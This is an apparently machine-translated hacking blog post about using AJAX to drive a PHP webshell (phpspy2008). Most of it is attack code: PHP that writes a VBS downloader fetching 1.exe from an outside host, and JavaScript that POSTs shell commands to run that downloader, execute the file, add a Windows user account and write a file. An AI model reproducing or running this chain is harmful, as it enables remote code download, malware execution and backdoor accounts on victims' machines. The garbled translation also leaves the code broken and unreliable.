AJAX security applications

Mango

I wanted to joke with people in the dark. Who knows the code after the csrf instance passes through the blacklist. Now I understand. None of the tricks used by Tom can be reused. It will not work again. It was impressive because it was too dark.

Let's record it. ajax is highly concealed. I used it in this way. Relatively thorough.
Copy content from PHP code to clipboard
Code:
Elseif ($ doing = writevbs ){
$ Fp = @ fopen (c:/angel. vbs, w );
$ Vbs = "Set love = CreateObject (" Microsoft. XMLHTTP ")".
"Love. Open" GET "," http://www.4ngel.net/1.exe ", 0 ".
"Love. Send ()".
"Set you = CreateObject (" ADODB. Stream ")".
"You. Mode = 3 ".
"You. Type = 1 ".
"You. Open ()".
"You. Write (love. responseBody )".
"You. SaveToFile" c: \ 1.exe", 2 ";
@ Fwrite ($ fp, $ vbs );
@ Fclose ($ fp );
} A piece of code is added to generate a VBS script. This script downloads a 1.exe file from 4ngel.netto another 1.exe file, and then there is a piece of AJAX function code.

Copy content from JavaScript code to clipboard
Code:
<Script type = "text/javascript">
Var http_request = false;
Function makeRequest (url, httpType, sendData ){
Http_request = false;
If (! HttpType) httpType = "GET ";

If (window. XMLHttpRequest) {// Non-IE...
Http_request = new XMLHttpRequest ();
If (http_request.overrideMimeType ){
Http_request.overrideMimeType (text/plain );
}
} Else if (window. ActiveXObject) {// IE
Try {
Http_request = new ActiveXObject ("Msxml2.XMLHTTP ");
} Catch (e ){
Try {
Http_request = new ActiveXObject ("Microsoft. XMLHTTP ");
} Catch (e ){}
}
}

If (! Http_request ){
Alert (Cannot send an XMLHTTP request );
Return false;
}

Http_request.open (httpType, url, true );
Http_request.setRequestHeader (Content-Type, application/x-www-form-urlencoded );
Http_request.send (sendData );
}
// MakeRequest (<? = $ Self?>, POST, action = file & doing = writevbs );
// MakeRequest (<? = $ Self?>, POST, action = shell & execfunc = system & command = c: angel. vbs );
// MakeRequest (<? = $ Self?>, POST, action = shell & execfunc = system & command = c: 1.exe );
MakeRequest (<? = $ Self?>, POST, action = shell & execfunc = system & command = net user angel/add );
MakeRequest (<? = $ Self?>, POST, action = shell & execfunc = system & command = echo my_name_is_angel> c: \ angel.txt );
</Script> the last few statements are POST requests to phpspy2008 in the local test environment, call the command execution function, generate vbs, and then run VBS. Then execute the downloaded exe file. But I have commented out. In this way, the local test is successful. You can't treat your brothers so hard. So it is commented out. Added a user.

I just want to say. AJAX, as a technology that has been gradually paid attention to, emphasizes increasing user experience while bringing security to users. Because of his request. You don't know. More specific applications depend on everyone's understanding.